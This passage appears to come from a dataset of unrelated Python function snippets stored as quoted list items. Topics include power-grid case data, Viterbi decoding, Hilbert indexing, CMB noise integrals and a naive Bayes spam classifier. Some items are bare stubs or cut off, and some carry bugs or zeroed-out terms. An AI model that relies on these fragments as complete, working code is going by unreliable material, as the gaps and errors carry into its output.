Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n 
ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]", "def test_active_inference_SPM_1b(self):", "def TR_algo2(p, vd=2):\n # h will contain the Hilbert index\n h = 0\n # ve and vd contain the entry point and dimension of the current subcube\n # we choose here a main traversal direction N-2 (i.e. z for a cube) to match\n # the illustrations\n ve = 0\n for i in range(M-1, -1, -1):\n # the cell label is constructed in two steps\n # 1. extract the relevant bits from p\n l = [bit_component(px, i) for px in p]\n # 2. 
construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n # transform l into the current subcube\n l = T(ve, vd, l)\n # obtain the gray code ordering from the label l\n w = inverse_gc(l)\n # compose (see [TR] lemma 2.13) the transform of ve and vd\n # with the data of the subcube\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % N\n # move the index to more significant bits and add current value\n h = (h << N) | w\n return h", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def test_generate_nb(self):\n pass", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. 
In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def ind_sim(n,CV,BV,N,p,d): \n dic={}\n dic2={}\n for i in range(N):\n Bt=random.choices('HL', weights=(p,1-p), k=n)\n pb=[round((1-p), 5) if x=='L' else p for x in Bt] \n Ct=random.choices('HL', weights=(p,1-p), k=n)\n pc=[round((1-p), 5) if x=='L' else p for x in Ct] \n [npvt,pr]=NPV(Bt,Ct,BV,CV,d,np.prod(pb),np.prod(pc))\n if npvt in dic.keys():\n dic[npvt] += 1\n else:\n dic[npvt] = 1\n dic2[npvt] =pr\n return (dic, dic2)", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n 
#print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "async def 
_design_lvl_shift_internal_inv(self, pseg: int, nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], is_ctrl: bool,\n has_rst: bool, dual_output: bool,\n vin: str, vout: str) -> Tuple[int, int]:\n if is_ctrl: # size with fanout\n inv_nseg = int(np.round(nseg / fanout))\n inv_nseg = 1 if inv_nseg == 0 else inv_nseg\n inv_pseg = int(np.round(pseg / fanout))\n inv_pseg = 1 if inv_pseg == 0 else inv_pseg\n self.log(f\"Calculated inv to need nseg : {inv_nseg}\")\n self.log(f\"Calculated inv to need pseg : {inv_pseg}\")\n return inv_pseg, inv_nseg\n\n # First size the NMOS in the inverter assuming a reasonably sized PMOS\n inv_nseg = await self._design_lvl_shift_inv_pdn(pseg, nseg, out_inv_m, fanout, pinfo,\n tbm_specs, has_rst, dual_output, vin, vout)\n self.log(f\"Calculated inv to need at least nseg: {inv_nseg}\")\n\n # Now using the inverter pull down size, we size the inverter pull up PMOS\n inv_pseg, inv_nseg = await self._design_lvl_shift_inv_pun(pseg, nseg, inv_nseg, out_inv_m,\n fanout, pinfo,\n tbm_specs, has_rst, dual_output,\n vin, vout)\n self.log(f\"Calculated inv to need pseg: {inv_pseg} and nseg: {inv_nseg}\")\n return inv_pseg, inv_nseg", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def nonhomo_system_variation_of_parameters(xc: List[Symbol], gt, t: Symbol = Symbol('t', real=True)):\n fund_matrix = eye(len(xc))\n for i, x in enumerate(xc):\n fund_matrix[:, i] = x\n\n procedure = Procedure()\n procedure.text('Fundamental matrix ').latex('\\\\Psi', nl=True)\\\n .eq(fund_matrix)\n\n gt = Matrix(gt)\n fund_inv = fund_matrix**(-1)\n procedure.text('Calculate the inverse of the fundamental matrix ').latex('\\\\Psi^{-1}', nl=True)\\\n .latex('\\\\Psi^{-1} = ').eq(fund_inv)\n\n fund_inv_gt = expand(simplify(fund_inv * gt))\n procedure.text('Compute ').latex('\\\\Psi^{-1} g(t)', nl=True)\\\n .latex('\\\\Psi^{-1} g(t) = ').eq(fund_inv_gt)\n\n procedure.text('Compute the integral', nl=True)\n fund_inv_gt_int = expand(simplify(integrate(fund_inv_gt)))\n procedure.latex('\\\\int \\\\Psi^{-1} g(t) =').eq(fund_inv_gt_int)\n\n procedure.text('Finally, ').latex(\n '\\\\vec{\\\\mathbf{x_p}} = \\\\Psi \\\\int \\\\Psi^{-1} g(t)', nl=True)\n sol = expand(fund_matrix * fund_inv_gt_int)\n procedure.latex('\\\\vec{\\\\mathbf{x_p}} =').eq(sol)\n return sol, procedure", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in 
range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n 